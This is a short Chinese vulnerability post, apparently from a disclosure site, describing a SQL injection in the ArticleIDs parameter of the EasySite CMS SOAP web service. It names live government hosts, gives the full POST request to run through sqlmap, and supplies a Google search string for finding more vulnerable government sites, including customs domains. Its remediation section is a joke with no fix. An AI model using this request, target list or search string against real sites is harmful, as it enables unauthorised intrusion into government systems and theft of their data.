easysite内容管理系统某简单粗暴的SQL注入 - 网站安

web services是不会骗人的~！ 大量gov站点采用了easysite内容管理系统。

详细说明：

1.soap注入 easysite webservice 文件：

http://www.py.gov.cn/DesktopModules/C_Info/WebService/C_InfoService.asmx

2.ArticleIDs参数存在SQL注入 漏洞

随便找个放sqlmap里跑吧

POST /DesktopModules/C_Info/WebService/C_InfoService.asmx HTTP/1.1 Host: dynamic.xmedu.gov.cn Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://tempuri.org/GetArticleHitsArray" <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetArticleHitsArray xmlns="http://tempuri.org/"> <ArticleIDs>string</ArticleIDs> </GetArticleHitsArray> </soap:Body> </soap:Envelope>

漏洞证明：

如果你不知道谁在用easysite，那就google（If you can open it）下把： inurl:asmx DesktopModules （海关总署N个域名都是这套 系统 ）

修复方案：

GOV 网站，不求RANK，别跨省就行。

查看更多关于easysite内容管理系统某简单粗暴的SQL注入 - 网站安的详细内容...